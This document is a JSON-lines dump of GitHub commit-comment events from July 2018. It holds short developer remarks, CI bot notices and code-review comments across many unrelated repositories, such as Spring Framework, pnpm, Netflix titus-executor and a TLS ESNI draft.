{"id":"7904229941","type":"CommitCommentEvent","actor":{"login":"zwmeimeimei"},"repo":{"name":"zwmeimeimei/hello_world"},"payload":{"comment":{"id":29560651,"position":null,"line":null,"path":null,"commit_id":"5ace6c7bdfbc77886bb37960c86857a800aa202e","created_at":"2018-07-02T02:59:18Z","updated_at":"2018-07-02T02:59:18Z","author_association":"OWNER","body":"Hi， all\r\njust a joker"}},"created_at":"2018-07-02T02:59:18Z"}
{"id":"7908642718","type":"CommitCommentEvent","actor":{"login":"fcdiomede"},"repo":{"name":"fcdiomede/Dataquest_Projects"},"payload":{"comment":{"id":29571426,"position":null,"line":null,"path":null,"commit_id":"bbc3b9ecb4a677ebcad359942683e10c5e7fb7ee","created_at":"2018-07-02T20:00:00Z","updated_at":"2018-07-02T20:00:00Z","author_association":"OWNER","body":"Moving file into associated project foler"}},"created_at":"2018-07-02T20:00:00Z"}
{"id":"7908643254","type":"CommitCommentEvent","actor":{"login":"jhoeller"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29571429,"position":15,"line":77,"path":"spring-beans/src/main/java/org/springframework/beans/factory/support/DefaultSingletonBeanRegistry.java","commit_id":"8a56db6e4ebc2db71fc0524bbeea22b7acae7d2a","created_at":"2018-07-02T20:00:07Z","updated_at":"2018-07-02T20:00:07Z","author_association":"CONTRIBUTOR","body":"Or are you mixing and matching and old spring-core jar with a newer spring-beans jar, by any chance? spring-beans-5.0.7 absolutely needs spring-core-5.0.7 on the classpath... as usual for any Spring Framework release."}},"created_at":"2018-07-02T20:00:07Z"}
{"id":"7908648342","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29571443,"position":null,"line":null,"path":null,"commit_id":"a4ae5918b40c388cb82905419afd2d6f29b0b824","created_at":"2018-07-02T20:01:12Z","updated_at":"2018-07-02T20:01:12Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-33](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-33).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-33-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-02T20:01:12Z"}
{"id":"7908653608","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29571453,"position":null,"line":null,"path":null,"commit_id":"61c4ce2e57f5b6a052b8b846849e661272c85c9c","created_at":"2018-07-02T20:02:22Z","updated_at":"2018-07-02T20:02:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-296](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-296).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-296-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-02T20:02:22Z"}
{"id":"7908654184","type":"CommitCommentEvent","actor":{"login":"Jupadr"},"repo":{"name":"Jupadr/eosblocktalk"},"payload":{"comment":{"id":29571454,"position":null,"line":null,"path":null,"commit_id":"e4ed81c04b196f5c73f8b57d61b6a1c31471a290","created_at":"2018-07-02T20:02:29Z","updated_at":"2018-07-02T20:02:29Z","author_association":"OWNER","body":"Code even compiles now. Haven't tested it yet on my node running sinle-node testnet. Should hopefully work. bt::_profile_exists is really ugly and I think I found a better way to approach this. Code is mostly copied the monstereos project because I don't feel to comfy with cpp yet. The parts that are not copied are of course heavily influenced by their structure of the code.\r\n\r\nI also thought about a way to later upgrade structs without having to migrate all of the tables. Maybe some sort of version tag in the structs?"}},"created_at":"2018-07-02T20:02:29Z"}
{"id":"7908656496","type":"CommitCommentEvent","actor":{"login":"liaqatpcr"},"repo":{"name":"liaqatpcr/yiihospital"},"payload":{"comment":{"id":29571457,"position":null,"line":null,"path":null,"commit_id":"6e6bc385ec7d1e9d1059c2b023ddbe4556bff537","created_at":"2018-07-02T20:03:01Z","updated_at":"2018-07-02T20:03:01Z","author_association":"OWNER","body":"ssdfsdf"}},"created_at":"2018-07-02T20:03:01Z"}
{"id":"7908657421","type":"CommitCommentEvent","actor":{"login":"RadRail"},"repo":{"name":"RadRail/Hello-World"},"payload":{"comment":{"id":29571461,"position":null,"line":null,"path":null,"commit_id":"97c3b913456e09554e8b8a1195e305629794df13","created_at":"2018-07-02T20:03:13Z","updated_at":"2018-07-02T20:03:13Z","author_association":"OWNER","body":"I'm a four percenter..."}},"created_at":"2018-07-02T20:03:13Z"}
{"id":"7908658446","type":"CommitCommentEvent","actor":{"login":"thom-w16"},"repo":{"name":"lordofhyphens/Slic3r"},"payload":{"comment":{"id":29571462,"position":null,"line":null,"path":null,"commit_id":"00183cacc644d3aacf80e2ea33a00b4435a8c5af","created_at":"2018-07-02T20:03:27Z","updated_at":"2018-07-02T20:03:27Z","author_association":"NONE","body":"Ok, it looks like others are having the same problem in Prusa Edition with no luck. I tried looking through the PE files but they are converting to C++ now so everything is in different syntax."}},"created_at":"2018-07-02T20:03:27Z"}
{"id":"7908658752","type":"CommitCommentEvent","actor":{"login":"Mevcia"},"repo":{"name":"Mevcia/Ewa-Bronowska_kodilla-java"},"payload":{"comment":{"id":29571465,"position":null,"line":null,"path":null,"commit_id":"be9d198ce3bd9f87ad155b18df86a4bc27d96030","created_at":"2018-07-02T20:03:31Z","updated_at":"2018-07-02T20:03:31Z","author_association":"OWNER","body":"According to suggestions of mentor I change name of the inner class to Builder and write all methodes names with small letter. "}},"created_at":"2018-07-02T20:03:31Z"}
{"id":"7908661178","type":"CommitCommentEvent","actor":{"login":"oren-sa"},"repo":{"name":"oren-sa/openelections-data-ne"},"payload":{"comment":{"id":29571475,"position":null,"line":null,"path":null,"commit_id":"2977579be7c96148d9d31b00df2fc6343789ad35","created_at":"2018-07-02T20:04:05Z","updated_at":"2018-07-02T20:04:05Z","author_association":"OWNER","body":"standardized all \"Vote\" Columns, standardize party names, standardized office names, standardized candidate names"}},"created_at":"2018-07-02T20:04:05Z"}
{"id":"7908663859","type":"CommitCommentEvent","actor":{"login":"mbod"},"repo":{"name":"cnlab/counterargue"},"payload":{"comment":{"id":29571481,"position":null,"line":null,"path":null,"commit_id":"58b32ba595e29db0a17a865d6c925ccaacb2dfbd","created_at":"2018-07-02T20:04:43Z","updated_at":"2018-07-02T20:04:43Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Counter Arguing Task Paper](https://trello.com/c/tc8tTgkk/368-counter-arguing-task-paper)"}},"created_at":"2018-07-02T20:04:43Z"}
{"id":"7908665387","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"williamkimball/small-business"},"payload":{"comment":{"id":29571485,"position":null,"line":null,"path":null,"commit_id":"cc323aa258e84339081f840443f87eaf6eb8b167","created_at":"2018-07-02T20:05:04Z","updated_at":"2018-07-02T20:05:04Z","author_association":"NONE","body":"I'm having trouble getting grunt to run because it can't find jquery. (I checked the package.json and it looks like it's not installed in this project! Do you by chance have jquery globally installed?)"}},"created_at":"2018-07-02T20:05:04Z"}
{"id":"7908670114","type":"CommitCommentEvent","actor":{"login":"iosonopersia"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29571497,"position":9,"line":282,"path":"Marlin/src/inc/SanityCheck.h","commit_id":"262ef6def7fa76c8941d19294f823ab2e7e9d526","created_at":"2018-07-02T20:06:08Z","updated_at":"2018-07-02T20:06:08Z","author_association":"NONE","body":"This error message refers to TMC2130, shouldn't it be referring to TMC2208?"}},"created_at":"2018-07-02T20:06:08Z"}
{"id":"7908673096","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29571502,"position":null,"line":null,"path":null,"commit_id":"f5d3936b4096df32f833ae3c21707b98f6171729","created_at":"2018-07-02T20:06:49Z","updated_at":"2018-07-02T20:06:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-220](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-220).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-220-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-02T20:06:49Z"}
{"id":"7908673784","type":"CommitCommentEvent","actor":{"login":"jgrier"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29571505,"position":null,"line":null,"path":null,"commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-02T20:06:59Z","updated_at":"2018-07-02T20:06:59Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-02T20:06:59Z"}
{"id":"7908676139","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey-server"},"payload":{"comment":{"id":29571507,"position":null,"line":null,"path":null,"commit_id":"1e4ae932689eb79df4062c007461b14531a26afe","created_at":"2018-07-02T20:07:32Z","updated_at":"2018-07-02T20:07:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Inventory Models](https://trello.com/c/yHK3aLGQ/8-inventory-models)"}},"created_at":"2018-07-02T20:07:32Z"}
{"id":"7908681910","type":"CommitCommentEvent","actor":{"login":"RadRail"},"repo":{"name":"RadRail/Hello-World"},"payload":{"comment":{"id":29571524,"position":null,"line":null,"path":null,"commit_id":"97c3b913456e09554e8b8a1195e305629794df13","created_at":"2018-07-02T20:08:54Z","updated_at":"2018-07-02T20:08:54Z","author_association":"OWNER","body":"Smeg in hell"}},"created_at":"2018-07-02T20:08:54Z"}
{"id":"7908687380","type":"CommitCommentEvent","actor":{"login":"rickkw"},"repo":{"name":"Netflix/titus-executor"},"payload":{"comment":{"id":29571534,"position":53,"line":132,"path":"uploader/s3.go","commit_id":"0089b759659161d061da3b83e14609683a398090","created_at":"2018-07-02T20:10:12Z","updated_at":"2018-07-02T20:10:12Z","author_association":"CONTRIBUTOR","body":"titus.executor.S3Uploader.successfullyUploadedBytes?"}},"created_at":"2018-07-02T20:10:12Z"}
{"id":"7908690044","type":"CommitCommentEvent","actor":{"login":"reecebedding"},"repo":{"name":"LynchyC/chase"},"payload":{"comment":{"id":29571538,"position":8,"line":8,"path":"src/main.ts","commit_id":"99758c2fde56730af9c41cf1bf2f175a2f10c871","created_at":"2018-07-02T20:10:48Z","updated_at":"2018-07-02T20:10:48Z","author_association":"NONE","body":"Dont set to null"}},"created_at":"2018-07-02T20:10:48Z"}
{"id":"7908691596","type":"CommitCommentEvent","actor":{"login":"jhoeller"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29571541,"position":15,"line":77,"path":"spring-beans/src/main/java/org/springframework/beans/factory/support/DefaultSingletonBeanRegistry.java","commit_id":"8a56db6e4ebc2db71fc0524bbeea22b7acae7d2a","created_at":"2018-07-02T20:11:10Z","updated_at":"2018-07-02T20:11:10Z","author_association":"CONTRIBUTOR","body":"Just noticed https://jira.spring.io/projects/SPR/issues/SPR-16996... I suppose it works for you now? Was it indeed a jar version mismatch?"}},"created_at":"2018-07-02T20:11:10Z"}
{"id":"7908692198","type":"CommitCommentEvent","actor":{"login":"vineetjohn"},"repo":{"name":"vineetjohn/linguistic-style-transfer"},"payload":{"comment":{"id":29571543,"position":null,"line":null,"path":null,"commit_id":"78ff53fc0c894d7c78326ce38c9952b86e48050a","created_at":"2018-07-02T20:11:17Z","updated_at":"2018-07-02T20:11:17Z","author_association":"OWNER","body":"Addresses #55 "}},"created_at":"2018-07-02T20:11:17Z"}
{"id":"7908696107","type":"CommitCommentEvent","actor":{"login":"MikeBloom914"},"repo":{"name":"MikeBloom914/VPNsetup"},"payload":{"comment":{"id":29571547,"position":null,"line":null,"path":null,"commit_id":"10c56e725bcc425c0602602d62ba01ef208a994e","created_at":"2018-07-02T20:12:05Z","updated_at":"2018-07-02T20:12:05Z","author_association":"OWNER","body":"Update"}},"created_at":"2018-07-02T20:12:05Z"}
{"id":"7908696365","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29571548,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T20:12:08Z","updated_at":"2018-07-02T20:12:08Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2928 of 2929 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T20:12:08Z"}
{"id":"7908696586","type":"CommitCommentEvent","actor":{"login":"jackfrancis"},"repo":{"name":"Azure/acs-engine"},"payload":{"comment":{"id":29571549,"position":5,"line":57,"path":"docs/clusterdefinition.md","commit_id":"8f401a15952937e7243ae30982b6e74cc49809da","created_at":"2018-07-02T20:12:11Z","updated_at":"2018-07-02T20:12:11Z","author_association":"MEMBER","body":"blech: https://github.com/Azure/acs-engine/pull/3400/files"}},"created_at":"2018-07-02T20:12:11Z"}
{"id":"7908696868","type":"CommitCommentEvent","actor":{"login":"reecebedding"},"repo":{"name":"LynchyC/chase"},"payload":{"comment":{"id":29571550,"position":29,"line":58,"path":"src/main.ts","commit_id":"99758c2fde56730af9c41cf1bf2f175a2f10c871","created_at":"2018-07-02T20:12:14Z","updated_at":"2018-07-02T20:12:14Z","author_association":"NONE","body":"Maybe set \"development\" as a global const ?"}},"created_at":"2018-07-02T20:12:14Z"}
{"id":"7908699778","type":"CommitCommentEvent","actor":{"login":"caouecs"},"repo":{"name":"caouecs/Laravel-lang"},"payload":{"comment":{"id":29571556,"position":null,"line":null,"path":null,"commit_id":"e569ff65b0e87cac01ff2fbbb3904de6bee79490","created_at":"2018-07-02T20:12:49Z","updated_at":"2018-07-02T20:12:49Z","author_association":"OWNER","body":"Yes, but the aim of this project is to be a basis for another packages specialized for languages in your project"}},"created_at":"2018-07-02T20:12:49Z"}
{"id":"7908699981","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"Netflix/titus-executor"},"payload":{"comment":{"id":29571558,"position":53,"line":132,"path":"uploader/s3.go","commit_id":"0089b759659161d061da3b83e14609683a398090","created_at":"2018-07-02T20:12:51Z","updated_at":"2018-07-02T20:12:51Z","author_association":"CONTRIBUTOR","body":"Yep."}},"created_at":"2018-07-02T20:12:51Z"}
{"id":"7908702703","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"Netflix/titus-executor"},"payload":{"comment":{"id":29571564,"position":53,"line":132,"path":"uploader/s3.go","commit_id":"0089b759659161d061da3b83e14609683a398090","created_at":"2018-07-02T20:13:27Z","updated_at":"2018-07-02T20:13:27Z","author_association":"CONTRIBUTOR","body":"I would say bytes rather than MB, because technically, dividing by 1024 / 1024 is MiB -- no reason not to report in Bytes"}},"created_at":"2018-07-02T20:13:27Z"}
{"id":"7908707191","type":"CommitCommentEvent","actor":{"login":"275515305"},"repo":{"name":"bhhe/276Group15"},"payload":{"comment":{"id":29571572,"position":null,"line":null,"path":null,"commit_id":"fc624150f638b874b629caf99177e49060b5763b","created_at":"2018-07-02T20:14:25Z","updated_at":"2018-07-02T20:14:25Z","author_association":"COLLABORATOR","body":"Complete garden list UI and create/delete feature"}},"created_at":"2018-07-02T20:14:25Z"}
{"id":"7908708681","type":"CommitCommentEvent","actor":{"login":"kazuho"},"repo":{"name":"ekr/draft-rescorla-tls-esni"},"payload":{"comment":{"id":29571574,"position":10,"line":282,"path":"draft-rescorla-tls-esni.md","commit_id":"6790c4bb482c95a60dc8c8eac7559b509167cbd7","created_at":"2018-07-02T20:14:45Z","updated_at":"2018-07-02T20:14:45Z","author_association":"COLLABORATOR","body":"Does https://github.com/ekr/draft-rescorla-tls-esni/pull/57 better clarify the logic we are trying to describe?\r\n\r\nMy understanding is that we should talk about clock skew in relation to absolute time (i.e. not_after). The DNS TTL paragraph talks about short-lived DNS records that use relative time to represent when they are expired, therefore are unlikely to be affected by clock skew."}},"created_at":"2018-07-02T20:14:45Z"}
{"id":"7908712134","type":"CommitCommentEvent","actor":{"login":"karfai"},"repo":{"name":"Xalgorithms/lib-rules-int-scala"},"payload":{"comment":{"id":29571581,"position":1,"line":1,"path":"test-runs/sg-bsd-tax/buyer_profiles.table.json","commit_id":"fa9b5aed0396234882ccb7eaeb8bf04e66bdbf31","created_at":"2018-07-02T20:15:30Z","updated_at":"2018-07-02T20:15:30Z","author_association":"CONTRIBUTOR","body":"Before you made this change, this file was invalid JSON. That's why you're getting the errors you see above. I'll leave the issue open because we should have better errors."}},"created_at":"2018-07-02T20:15:30Z"}
{"id":"7908714101","type":"CommitCommentEvent","actor":{"login":"karfai"},"repo":{"name":"Xalgorithms/lib-rules-int-scala"},"payload":{"comment":{"id":29571588,"position":11,"line":11,"path":"test-runs/sg-bsd-tax/bsd.rule","commit_id":"fa9b5aed0396234882ccb7eaeb8bf04e66bdbf31","created_at":"2018-07-02T20:15:57Z","updated_at":"2018-07-02T20:15:57Z","author_association":"CONTRIBUTOR","body":"This is not a real error. The table data in JSON was invalid."}},"created_at":"2018-07-02T20:15:57Z"}
{"id":"7908715565","type":"CommitCommentEvent","actor":{"login":"nionis"},"repo":{"name":"pnpm/pnpm"},"payload":{"comment":{"id":29571589,"position":null,"line":null,"path":null,"commit_id":"90c7874df2bb9dfc42c2f9cdbd662a276ea4bd23","created_at":"2018-07-02T20:16:15Z","updated_at":"2018-07-02T20:16:15Z","author_association":"NONE","body":"does this respect versioning?\r\n\r\nfor example I have:\r\n\r\n1. packages/package-a v2.0.0\r\n\r\n2. packages/package-b v2.0.0\r\n    dependancies\r\n        package-a v1.0.0\r\n\r\nSeems right to me that pnpm should remotely try to pull v1.0.0 and then fail since our local version is v2.0.0"}},"created_at":"2018-07-02T20:16:15Z"}
{"id":"7908715653","type":"CommitCommentEvent","actor":{"login":"ekr"},"repo":{"name":"ekr/draft-rescorla-tls-esni"},"payload":{"comment":{"id":29571590,"position":10,"line":282,"path":"draft-rescorla-tls-esni.md","commit_id":"6790c4bb482c95a60dc8c8eac7559b509167cbd7","created_at":"2018-07-02T20:16:15Z","updated_at":"2018-07-02T20:16:15Z","author_association":"OWNER","body":"I merged it\n\nOn Mon, Jul 2, 2018 at 1:14 PM, Kazuho Oku <notifications@github.com> wrote:\n\n> Does #57 <https://github.com/ekr/draft-rescorla-tls-esni/pull/57> better\n> clarify the logic we are trying to describe?\n>\n> My understanding is that we should talk about clock skew in relation to\n> absolute time (i.e. not_after). The DNS TTL paragraph talks about\n> short-lived DNS records that use relative time to represent when they are\n> expired, therefore are unlikely to be affected by clock skew.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ekr/draft-rescorla-tls-esni/commit/6790c4bb482c95a60dc8c8eac7559b509167cbd7#commitcomment-29571574>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABD1odTC1w1VhXQ1fnyQmaAOiEHfJWocks5uCn81gaJpZM4U_f7o>\n> .\n>\n"}},"created_at":"2018-07-02T20:16:15Z"}
{"id":"7908717179","type":"CommitCommentEvent","actor":{"login":"fabiosalvi"},"repo":{"name":"giusepperossetti/angTrial"},"payload":{"comment":{"id":29571596,"position":24,"line":25,"path":"appAng/src/app/carousel/carousel.component.ts","commit_id":"34b3d69f89f16d2f1dfda7719f2e5cb7bbdca05e","created_at":"2018-07-02T20:16:36Z","updated_at":"2018-07-02T20:16:36Z","author_association":"NONE","body":"This is not your own doing. Ain't it? :-)"}},"created_at":"2018-07-02T20:16:36Z"}
{"id":"7908718236","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29571602,"position":null,"line":null,"path":null,"commit_id":"a8c65afca15a557bc7c3788ad3cacdfee2d18467","created_at":"2018-07-02T20:16:51Z","updated_at":"2018-07-02T20:16:51Z","author_association":"MEMBER","body":"@fichtner you may wait some weeks so it can happen in a major release and not somewhere in between - I would expect all breaking changes there."}},"created_at":"2018-07-02T20:16:51Z"}
{"id":"7908720193","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29571607,"position":136,"line":136,"path":"src/main/java/org/digitalmediaserver/crowdin/configuration/FileType.java","commit_id":"ba4177f3419951ddb0796f305fa02cb28b13afe1","created_at":"2018-07-02T20:17:15Z","updated_at":"2018-07-02T20:17:15Z","author_association":"NONE","body":"Huù...that make me think that [.ttml](https://en.wikipedia.org/wiki/Timed_Text_Markup_Language) and .[dfxp](https://www.w3.org/TR/2018/CR-ttml1-20180424/) should also be supported."}},"created_at":"2018-07-02T20:17:15Z"}
{"id":"7908724417","type":"CommitCommentEvent","actor":{"login":"Jazaret"},"repo":{"name":"Jazaret/Nancy"},"payload":{"comment":{"id":29571616,"position":null,"line":null,"path":null,"commit_id":"ef4e0f17da102dd5c78ad070fb2cb3a57ccfd394","created_at":"2018-07-02T20:18:10Z","updated_at":"2018-07-02T20:18:10Z","author_association":"OWNER","body":"closes issue #1 & issue #2 "}},"created_at":"2018-07-02T20:18:10Z"}
{"id":"7908729942","type":"CommitCommentEvent","actor":{"login":"toastmalone"},"repo":{"name":"toastmalone/fap"},"payload":{"comment":{"id":29571626,"position":null,"line":null,"path":null,"commit_id":"783e85a9613df21fbfff840480644a5e6859507d","created_at":"2018-07-02T20:19:22Z","updated_at":"2018-07-02T20:19:22Z","author_association":"OWNER","body":"What is this?!?!?!?!?!?!?!?!?!?"}},"created_at":"2018-07-02T20:19:22Z"}
{"id":"7908735444","type":"CommitCommentEvent","actor":{"login":"zkochan"},"repo":{"name":"pnpm/pnpm"},"payload":{"comment":{"id":29571637,"position":null,"line":null,"path":null,"commit_id":"90c7874df2bb9dfc42c2f9cdbd662a276ea4bd23","created_at":"2018-07-02T20:20:34Z","updated_at":"2018-07-02T20:20:34Z","author_association":"MEMBER","body":"> pnpm should remotely try to pull v1.0.0 since our local version is v2.0.0\r\n\r\n@nionis\r\ncorrect. That is how it currently works. This pull request is not changing that behavior"}},"created_at":"2018-07-02T20:20:34Z"}
{"id":"7908735752","type":"CommitCommentEvent","actor":{"login":"toastmalone"},"repo":{"name":"SUNsung/fap"},"payload":{"comment":{"id":29571638,"position":null,"line":null,"path":null,"commit_id":"783e85a9613df21fbfff840480644a5e6859507d","created_at":"2018-07-02T20:20:38Z","updated_at":"2018-07-02T20:20:38Z","author_association":"NONE","body":"WHAT IS THIS MADNESS?!??!?!?!?!?\r\n"}},"created_at":"2018-07-02T20:20:38Z"}
{"id":"7908738186","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29571643,"position":136,"line":136,"path":"src/main/java/org/digitalmediaserver/crowdin/configuration/FileType.java","commit_id":"ba4177f3419951ddb0796f305fa02cb28b13afe1","created_at":"2018-07-02T20:21:11Z","updated_at":"2018-07-02T20:21:11Z","author_association":"CONTRIBUTOR","body":"Hehe, tell Crowdin :wink:  This list is that given in Crowdin's API, so there's no use for us to add values to it :smirk: "}},"created_at":"2018-07-02T20:21:11Z"}
{"id":"7908738803","type":"CommitCommentEvent","actor":{"login":"domzae"},"repo":{"name":"domzae/Shadow-Rework"},"payload":{"comment":{"id":29571645,"position":null,"line":null,"path":null,"commit_id":"1901c45eb051383b9bf43d74e405bea8a56db8d5","created_at":"2018-07-02T20:21:19Z","updated_at":"2018-07-02T20:21:19Z","author_association":"OWNER","body":"v1186"}},"created_at":"2018-07-02T20:21:19Z"}
{"id":"7908739663","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29571647,"position":null,"line":null,"path":null,"commit_id":"74c529dccf200616faf72ef4ec1d93af7ef91782","created_at":"2018-07-02T20:21:31Z","updated_at":"2018-07-02T20:21:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T20:21:31Z"}
{"id":"7908742214","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey-server"},"payload":{"comment":{"id":29571656,"position":null,"line":null,"path":null,"commit_id":"b9d6a22893756b9ee9d37b0489d0cee8c413fbe7","created_at":"2018-07-02T20:22:06Z","updated_at":"2018-07-02T20:22:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Inventory Models](https://trello.com/c/yHK3aLGQ/8-inventory-models)"}},"created_at":"2018-07-02T20:22:06Z"}
{"id":"7908742630","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey-server"},"payload":{"comment":{"id":29571658,"position":null,"line":null,"path":null,"commit_id":"757801504bf2648dc1171713007de63843e267b3","created_at":"2018-07-02T20:22:11Z","updated_at":"2018-07-02T20:22:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Inventory Models](https://trello.com/c/yHK3aLGQ/8-inventory-models)"}},"created_at":"2018-07-02T20:22:11Z"}
{"id":"7908743088","type":"CommitCommentEvent","actor":{"login":"alemermartinez"},"repo":{"name":"alemermartinez/RMI"},"payload":{"comment":{"id":29571659,"position":null,"line":null,"path":null,"commit_id":"a84a16a84cfe2edd1c83f14653e9828dd9425a20","created_at":"2018-07-02T20:22:17Z","updated_at":"2018-07-02T20:22:17Z","author_association":"OWNER","body":"Lo borro porque lo hice mal"}},"created_at":"2018-07-02T20:22:17Z"}
{"id":"7908743817","type":"CommitCommentEvent","actor":{"login":"justinjpacheco"},"repo":{"name":"bloomberg/chef-bcpc"},"payload":{"comment":{"id":29571660,"position":5,"line":4,"path":"ansible/group_vars/all","commit_id":"e689438b2a0c129658dd0fe1c81414ba8e9a5eca","created_at":"2018-07-02T20:22:27Z","updated_at":"2018-07-02T20:22:27Z","author_association":"NONE","body":"if python3 isn't the default then ansible will use python2 which will require additional modules to download when installing chef-server/chef-workstation. can we use /usr/bin/env python3?"}},"created_at":"2018-07-02T20:22:27Z"}
{"id":"7908770154","type":"CommitCommentEvent","actor":{"login":"Jumblemuddle"},"repo":{"name":"kommen/cljs-slate"},"payload":{"comment":{"id":29571732,"position":null,"line":null,"path":null,"commit_id":"2c4b8f438d75826a5e728c3d42455cb9d4e20e3c","created_at":"2018-07-02T20:28:24Z","updated_at":"2018-07-02T20:28:24Z","author_association":"NONE","body":"For anyone running across this, see https://github.com/google/closure-compiler/issues/2971#issuecomment-401537832\r\nThe master branch of `closure-compiler` fixes the issues for me.\r\nThanks for the direction @kommen."}},"created_at":"2018-07-02T20:28:24Z"}
{"id":"7908771359","type":"CommitCommentEvent","actor":{"login":"troturier"},"repo":{"name":"troturier/Go4Lunch"},"payload":{"comment":{"id":29571737,"position":null,"line":null,"path":null,"commit_id":"e5d68cf2343ee88e8d5f97512c725b261b80747b","created_at":"2018-07-02T20:28:40Z","updated_at":"2018-07-02T20:28:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Créer une activité de connexion](https://trello.com/c/EZa3HBga/1-cr%C3%A9er-une-activit%C3%A9-de-connexion)"}},"created_at":"2018-07-02T20:28:40Z"}
{"id":"7908772197","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571740,"position":61,"line":61,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:28:52Z","updated_at":"2018-07-02T20:28:52Z","author_association":"NONE","body":"Aqui é legal discutir um pouco com os alunos sobre o quanto aumentar, começar aumentando de 1 em 1, dobrar o tamanho, etc..."}},"created_at":"2018-07-02T20:28:52Z"}
{"id":"7908774797","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571746,"position":45,"line":45,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:29:27Z","updated_at":"2018-07-02T20:29:27Z","author_association":"NONE","body":"Acho legal fazer na mão no primeiro momento"}},"created_at":"2018-07-02T20:29:27Z"}
